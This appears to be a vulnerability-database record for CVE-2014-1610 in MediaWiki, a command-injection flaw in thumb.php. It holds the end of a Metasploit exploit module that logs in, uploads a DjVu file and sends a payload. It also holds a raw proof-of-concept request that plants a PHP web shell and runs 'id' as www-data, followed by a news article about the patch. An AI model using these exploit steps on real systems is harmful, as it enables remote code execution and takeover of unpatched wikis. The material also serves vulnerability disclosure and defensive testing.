opts['redirect_uri']\r\n vprint_status("Redirected to #{opts['redirect_uri']}.")\r\n end\r\n\r\n unless response\r\n vprint_status("No response from #{full_uri}.")\r\n return CheckCode::Unknown\r\n end\r\n\r\n # Mediawiki will give a 404 for unknown pages but still have a body\r\n if response.code == 200 || response.code == 404\r\n vprint_status("#{response.code} response received...")\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n unless major\r\n return CheckCode::Unknown\r\n end\r\n\r\n if major == 1 && (minor < 8 || minor > 22)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 22 && patch > 1)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 21 && patch > 4)\r\n return CheckCode::Safe\r\n elsif major == 1 && (minor == 19 && patch > 10)\r\n return CheckCode::Safe\r\n elsif major == 1\r\n return CheckCode::Appears\r\n else\r\n return CheckCode::Safe\r\n end\r\n end\r\n\r\n vprint_status("Received response code #{response.code} from #{full_uri}")\r\n CheckCode::Unknown\r\n end\r\n\r\n def exploit\r\n uri = target_uri.path\r\n\r\n print_status("Grabbing version and login CSRF token...")\r\n response = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'vars_get' => { 'title' => 'Special:UserLogin' }\r\n })\r\n\r\n unless response\r\n fail_with(Failure::NotFound, "Failed to retrieve webpage.")\r\n end\r\n\r\n server = response['Server']\r\n if server && target.name =~ /automatic/i && server =~ /win32/i\r\n vprint_status("Windows platform detected: #{server}.")\r\n my_platform = Msf::Module::Platform::Windows\r\n elsif server && target.name =~ /automatic/i\r\n vprint_status("Nix platform detected: #{server}.")\r\n my_platform = Msf::Module::Platform::Unix\r\n else\r\n my_platform = target.platform.platforms.first\r\n end\r\n\r\n # If we have already identified a DjVu/PDF file on the server trigger\r\n # the exploit\r\n unless datastore['FILENAME'].blank?\r\n payload_request(uri, datastore['FILENAME'], my_platform)\r\n return\r\n end\r\n\r\n username = datastore['USERNAME']\r\n password = datastore['PASSWORD']\r\n\r\n major, minor, patch = get_version(response.body)\r\n\r\n # Upload CSRF added in v1.18.2\r\n # http://www.mediawiki.org/wiki/Release_notes/1.18#Changes_since_1.18.1\r\n if ((major == 1) && (minor == 18) && (patch == 0 || patch == 1))\r\n upload_csrf = false\r\n elsif ((major == 1) && (minor < 18))\r\n upload_csrf = false\r\n else\r\n upload_csrf = true\r\n end\r\n\r\n session_cookie = response.get_cookies\r\n\r\n wp_login_token = get_html_value(response.body, 'input', 'wpLoginToken', 'value')\r\n\r\n if wp_login_token.blank?\r\n fail_with(Failure::UnexpectedReply, "Couldn't find login token. Is URI set correctly?")\r\n else\r\n print_good("Retrieved login CSRF token.")\r\n end\r\n\r\n print_status("Attempting to login...")\r\n login = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php'),\r\n 'method' => 'POST',\r\n 'vars_get' => {\r\n 'title' => 'Special:UserLogin',\r\n 'action' => 'submitlogin',\r\n 'type' => 'login'\r\n },\r\n 'cookie' => session_cookie,\r\n 'vars_post' => {\r\n 'wpName' => username,\r\n 'wpPassword' => password,\r\n 'wpLoginAttempt' => 'Log in',\r\n 'wpLoginToken' => wp_login_token\r\n }\r\n })\r\n\r\n if login and login.code == 302\r\n print_good("Log in successful.")\r\n else\r\n fail_with(Failure::NoAccess, "Failed to log in.")\r\n end\r\n\r\n auth_cookie = login.get_cookies.gsub('mediawikiToken=deleted;','')\r\n\r\n # Testing v1.15.1 it looks like it has session fixation\r\n # vulnerability so we dont get a new session cookie after\r\n # authenticating. Therefore we need to include our old cookie.\r\n unless auth_cookie.include? 'session='\r\n auth_cookie << session_cookie\r\n end\r\n\r\n print_status("Getting upload CSRF token...") if upload_csrf\r\n upload_file = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n unless upload_file and upload_file.code == 200\r\n fail_with(Failure::NotFound, "Failed to access file upload page.")\r\n end\r\n\r\n wp_edit_token = get_html_value(upload_file.body, 'input', 'wpEditToken', 'value') if upload_csrf\r\n wp_upload = get_html_value(upload_file.body, 'input', 'wpUpload', 'value')\r\n title = get_html_value(upload_file.body, 'input', 'title', 'value')\r\n\r\n if upload_csrf && wp_edit_token.blank?\r\n fail_with(Failure::UnexpectedReply, "Couldn't find upload token. Is URI set correctly?")\r\n elsif upload_csrf\r\n print_good("Retrieved upload CSRF token.")\r\n end\r\n\r\n upload_mime = Rex::MIME::Message.new\r\n\r\n djvu_file = ::File.read(::File.join(Msf::Config.data_directory, "exploits", "cve-2014-1610", "metasploit.djvu"))\r\n file_name = "#{rand_text_alpha(4)}.djvu"\r\n\r\n upload_mime.add_part(djvu_file, "application/octet-stream", "binary", "form-data; name=\\"wpUploadFile\\"; filename=\\"#{file_name}\\"")\r\n upload_mime.add_part("#{file_name}", nil, nil, "form-data; name=\\"wpDestFile\\"")\r\n upload_mime.add_part("#{rand_text_alpha(4)}", nil, nil, "form-data; name=\\"wpUploadDescription\\"")\r\n upload_mime.add_part("", nil, nil, "form-data; name=\\"wpLicense\\"")\r\n upload_mime.add_part("1",nil,nil, "form-data; name=\\"wpIgnoreWarning\\"")\r\n upload_mime.add_part(wp_edit_token, nil, nil, "form-data; name=\\"wpEditToken\\"") if upload_csrf\r\n upload_mime.add_part(title, nil, nil, "form-data; name=\\"title\\"")\r\n upload_mime.add_part("1", nil, nil, "form-data; name=\\"wpDestFileWarningAck\\"")\r\n upload_mime.add_part(wp_upload, nil, nil, "form-data; name=\\"wpUpload\\"")\r\n post_data = upload_mime.to_s\r\n\r\n print_status("Uploading DjVu file #{file_name}...")\r\n\r\n upload = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(uri, 'index.php', 'Special:Upload'),\r\n 'data' => post_data,\r\n 'ctype' => "multipart/form-data; boundary=#{upload_mime.bound}",\r\n 'cookie' => auth_cookie\r\n })\r\n\r\n if upload and upload.code == 302 and upload.headers['Location']\r\n location = upload.headers['Location']\r\n print_good("File uploaded to #{location}")\r\n else\r\n if upload.body.include? 'not a permitted file type'\r\n fail_with(Failure::NotVulnerable, "Wiki is not configured for target files.")\r\n else\r\n fail_with(Failure::UnexpectedReply, "Failed to upload file.")\r\n end\r\n end\r\n\r\n payload_request(uri, file_name, my_platform)\r\n end\r\n\r\n def payload_request(uri, file_name, my_platform)\r\n if my_platform == Msf::Module::Platform::Windows\r\n trigger = "1)&(#{payload.encoded})&"\r\n else\r\n trigger = "1;#{payload.encoded};"\r\n end\r\n\r\n vars_get = { 'f' => file_name }\r\n if file_name.include? '.pdf'\r\n vars_get['width'] = trigger\r\n elsif file_name.include? '.djvu'\r\n vars_get['width'] = 1\r\n vars_get['p'] = trigger\r\n else\r\n fail_with(Failure::BadConfig, "Unsupported file extension: #{file_name}")\r\n end\r\n\r\n print_status("Sending payload request...")\r\n r = send_request_cgi({\r\n 'uri' => normalize_uri(uri, 'thumb.php'),\r\n 'vars_get' => vars_get\r\n }, 1)\r\n\r\n if r && r.code == 404 && r.body =~ /not exist/\r\n print_error("File: #{file_name} does not exist.")\r\n elsif r\r\n print_error("Received response #{r.code}, exploit probably failed.")\r\n end\r\n end\r\n\r\n # The order of name, value keeps shifting so regex is painful.\r\n # Cant use nokogiri due to security issues\r\n # Cant use REXML directly as its not strict XHTML\r\n # So we do a filthy mixture of regex and REXML\r\n def get_html_value(html, type, name, value)\r\n return nil unless html\r\n return nil unless type\r\n return nil unless name\r\n return nil unless value\r\n\r\n found = nil\r\n html.each_line do |line|\r\n if line =~ /(<#{type}[^\\/]*name="#{name}".*?\\/>)/i\r\n found = $&\r\n break\r\n end\r\n end\r\n\r\n if found\r\n doc = REXML::Document.new found\r\n return doc.root.attributes[value]\r\n end\r\n\r\n ''\r\n end\r\nend\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-85082", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T17:34:30", "description": "CVE ID:CVE-2014-1610\r\n\r\nMediaWiki\u662f\u7f8e\u56fd\u7ef4\u57fa\u5a92\u4f53\uff08Wikimedia\uff09\u57fa\u91d1\u4f1a\u548cMediaWiki\u5fd7\u613f\u8005\u5171\u540c\u5f00\u53d1\u7ef4\u62a4\u7684\u4e00\u5957\u81ea\u7531\u514d\u8d39\u7684\u57fa\u4e8e\u7f51\u7edc\u7684Wiki\u5f15\u64ce\uff0c\u5b83\u53ef\u7528\u4e8e\u90e8\u7f72\u5185\u90e8\u7684\u77e5\u8bc6\u7ba1\u7406\u548c\u5185\u5bb9\u7ba1\u7406\u7cfb\u7edf\u3002 \r\n\r\nMediaWiki\u4e2d\u5b58\u5728\u8f93\u5165\u9a8c\u8bc1\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u6e90\u4e8ethumb.php\u811a\u672c\u6ca1\u6709\u6b63\u786e\u8fc7\u6ee4\u2018page\u2019\u53c2\u6570\u3002\u5f53\u542f\u7528\u652f\u6301\u4e0a\u4f20DjVu\u6216PDF\u6587\u4ef6\u65f6\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u501f\u52a9\u7279\u5236\u7684shell\u5143\u5b57\u7b26\u5229\u7528\u8be5\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\u4ee5\u4e0b\u7248\u672c\u53d7\u5230\u5f71\u54cd\uff1aMediaWiki 1.22.2\u4e4b\u524d\u76841.22.x\u7248\u672c\uff0c1.21.5\u4e4b\u524d\u76841.21.x\u7248\u672c\uff0c1.19.11\u4e4b\u524d\u76841.19.x\u7248\u672c\u3002\n0\nMediaWiki <= 1.22.1\r\nMediaWiki <= 1.21.4\r\nMediaWiki <= 1.19.10\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMediaWiki\r\n-----\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6b64\u5b89\u5168\u95ee\u9898\uff0c\u8865\u4e01\u83b7\u53d6\u94fe\u63a5\uff1a \r\n\r\nhttp://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html", "cvss3": {}, "published": "2014-02-13T00:00:00", "type": "seebug", "title": "MediaWiki\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61437", "id": "SSV:61437", "sourceData": "\n GET /mediawiki1221/thumb.php?f=longcat.pdf&w=10|`echo%20%22%3C\r\nphp%20system(\\\\$_GET[1]);%22%3Eimages/longcat.php`\r\nHTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiUserID=2; my_wikiUserName=Longcat;\r\nmy_wiki_session=op3h2huvddnmg7gji0pscfsg02\r\n \r\n<html><head><title>Error generating thumbnail</title></head>\r\n<body>\r\n<h1>Error generating thumbnail</h1>\r\n<p>\r\n\u0e40\u0e01\u0e34\u0e14\u0e1b\u0e31\u0e0d\u0e2b\u0e32\u0e44\u0e21\u0e48\u0e2a\u0e32\u0e21\u0e32\u0e23\u0e16\u0e17\u0e33\u0e23\u0e39\u0e1b\u0e22\u0e48\u0e2d\u0e44\u0e14\u0e49: /bin/bash: -: command not found<br />\r\nconvert: option requires an argument `-resize' @\r\nerror/convert.c/ConvertImageCommand/2380.<br />\r\nGPL Ghostscript 9.10: Unrecoverable error, exit code 1<br />\r\n \r\n</p>\r\n \r\n</body>\r\n</html>\r\n \r\n \r\nGET /mediawiki1221/images/longcat.php?1=id HTTP/1.1\r\nHost: 127.0.0.1\r\nConnection: keep-alive\r\nAccept:\r\ntext/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\nCookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2;\r\nmy_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1\r\n \r\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61437", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2018-01-27T09:17:42", "description": "[](<https://4.bp.blogspot.com/-K0XlEYvexd8/UuolXbDRtQI/AAAAAAAAAS0/NGDSXCuuLJY/s1600/MediaWiki.jpg>)\n\nThe Encyclopedia giant **WIKIPEDIA** has been found vulnerable to [remote code execution](<https://thehackernews.com/search/label/remote%20code%20execution>) because of a critical flaw in _the MediaWiki software_.\n\n \n\n\nWikipedia is a name which has become a major source of information for all of us. It has webpages on almost every topic you need to search.\n\n \n\n\nThis giant is powered by an open source wiki software called MediaWiki. MediaWiki not only empowers Wikipedia, but also a number of other wiki websites. This software is a product of the Wikimedia Foundation and is coded in PHP with a database as backend.\n\n \n\n\n_Cyber Point Software Technologies_ [found](<http://www.checkpoint.com/threatcloud-central/articles/2014-01-28-tc-researchers-discover.html>) a remote code execution vulnerability in MediaWiki, \"_This vulnerability affects all versions of MediaWiki from 1.8 onwards._\" \n \nThe vulnerability assigned with ID [_CVE-2014-1610_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1610>) allows an attacker to execute shell code remotely via an incorrectly sanitized parameter on the MediaWiki application server. \n\n> _\u201cShell meta characters can be passed in the page parameter to the thumb.php.\u201d [Bug 60339](<https://bugzilla.wikimedia.org/show_bug.cgi?id=60339>)._\n\n**MediaWiki **announced** [Security Releases](<https://lists.wikimedia.org/pipermail/mediawiki-announce/2014-January/000140.html>) **1.22.2, 1.21.5 and 1.19.11,** \"**_Your MediaWiki installation is affected by a remote code execution vulnerability if you have enabled file upload support for DjVu (natively supported by MediaWiki) or PDF files (in combination with the PdfHandler extension). Neither file type is enabled by default in MediaWiki installations. If you are affected, we strongly urge you to update immediately._**\"** \n** \n** **Key Findings:**_** **_The vulnerability might have caused Wikipedia\u2019s web servers a malicious content distributor, if left uncovered. \n \n\"_Check Point promptly alerted the WikiMedia Foundation to the presence of this vulnerability, and after verifying it the Foundation released a software update to correct the issue._\"\n\n \n\n\nAn update was released from the _Wikimedia Foundation_ after knowing about the vulnerability from Check Point. This is the 3rd 'remote code execution' [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) reported in MediaWiki Platform, since 2006.\n\n \n\n\n\u201c_It only takes a single vulnerability on a widely adopted platform for a hacker to infiltrate and wreak widespread damage_,\u201d says Dorit Dor, vice president of products, Check Point Software Technologies. Check Point's Vulnerability Research Group assesses common software to ensure the security of Internet users. \n \nMediaWiki 's latest version_ 1.22.2 Stable_ is fully patched to defend against this flaw, and Wikipedia is now also upgraded to it.\n\n \n\n\nSince almost all cyber security enthusiasts are putting efforts in finding security loopholes in the products available on the Internet, that has put Open source technology to the highest priority in terms of security testing.\n", "cvss3": {}, "published": "2014-01-29T23:20:00", "type": "thn", "title": "MediaWiki Remote Code Execution vulnerability leaves Wikipedia open for Cyber attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-1610"], "modified": "2014-01-30T10:50:25", "id": "THN:14D220C3673BA5820F7A055DC2CB7A3A", "href": "https://thehackernews.com/2014/01/mediawiki-remote-code-execution.html", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
[SECURITY] Fedora 19 Update: mediawiki-1.23.2-1.fc19
